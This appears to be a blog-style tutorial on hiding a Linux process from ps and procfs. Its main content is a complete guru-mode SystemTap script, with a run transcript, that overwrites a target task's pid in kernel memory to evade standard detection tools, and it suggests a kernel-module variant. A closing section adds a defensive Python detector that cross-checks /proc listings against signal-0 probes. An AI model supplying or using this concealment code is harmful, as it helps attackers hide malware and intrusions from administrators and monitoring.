Hide a Linux Process with One Line of SystemTap Code

Learn a quick, unconventional method to conceal a Linux process from userspace by simply altering its PID with a one‑line SystemTap script, demonstrating how modifying kernel task structures can make the process invisible in procfs and evade standard detection tools.

Open Source Linux

Many people ask how to hide a Linux process. Instead of complex kernel hooks or user‑space tricks, you can achieve a simple concealment by modifying the process's PID.

The technique involves changing the PID to an unregistered value, making the process invisible in procfs and undetectable by ps:

target->pid = 0x7fffffff;

Full SystemTap script:

#!/usr/bin/stap -g
# hide.stp

global pid;

function hide(who:long)
%{
    struct task_struct *target;

    target = pid_task(find_vpid(STAP_ARG_who), PIDTYPE_PID);
    target->pid = 0x7fffffff;
%}

probe begin
{
    pid = $1
    hide(pid);
    exit();
}

Run the script:

[root@localhost system]# ./tohide &
[1] 403
[root@localhost system]# ./hide.stp
[root@localhost system]#

List the executable binaries of all processes visible in procfs:

for pid in $(ls /proc|awk '/^[0-9]+/{print $1}'); do
    ls -l /proc/$pid/exe;
done

Because the chosen PID (e.g., 0x7fffffff) has never been registered, it does not appear in procfs, so standard tools like ps cannot list it.

If you prefer not to use SystemTap, you can write a custom Linux kernel module that directly sets target->pid to the desired value and returns -1, which is even simpler than various hook methods.

In short, when a task is created, its PID registers a procfs directory entry. The procfs traversal uses the PID as a key to locate the task. Assigning an unregistered PID makes the entry invisible.
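A cross-view check a defender can run against this kind of hiding, as an added example that is not part of the original article: it compares what /proc enumeration lists with what answers a direct signal-0 probe, and re-checks to filter out processes that start or exit mid-scan. It assumes the hidden task still resolves under its original PID, since the script above changes only the pid field of the task_struct; all function names are hypothetical.

```python
#!/usr/bin/env python3
"""Cross-view check for tasks hidden from /proc enumeration (added example)."""
import os

PROC = "/proc"

def enumerated_ids(proc=PROC):
    """Every PID and thread ID reachable by listing /proc and /proc/<pid>/task."""
    ids = set()
    for name in os.listdir(proc):
        if not name.isdigit():
            continue
        ids.add(int(name))
        try:
            # Thread IDs also answer probes, so collect them to avoid false positives.
            ids.update(int(t) for t in os.listdir(f"{proc}/{name}/task"))
        except OSError:
            pass  # process exited between the two listings
    return ids

def answers(pid):
    """True if the kernel still resolves this ID, whether or not it is listed."""
    try:
        os.kill(pid, 0)      # signal 0: existence check only, nothing is delivered
    except ProcessLookupError:
        return False
    except PermissionError:
        return True          # exists, but is owned by another user
    return True

def find_hidden(pid_range, enumerate_ids=enumerated_ids, probe=answers):
    """IDs that answer a direct probe but never show up in enumeration."""
    before = enumerate_ids()
    suspects = [p for p in pid_range if p not in before and probe(p)]
    # Re-list and re-probe so processes that merely started or exited
    # during the scan are not reported.
    after = enumerate_ids()
    return [p for p in suspects if p not in after and probe(p)]

def pid_max():
    with open("/proc/sys/kernel/pid_max") as f:
        return int(f.read())

if __name__ == "__main__":
    for pid in find_hidden(range(1, pid_max() + 1)):
        print(f"PID {pid} answers kill(0) but is not listed in {PROC}")
```

Run it as root so that every probe result is unambiguous; a reported PID is a lead to investigate, not proof of tampering.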
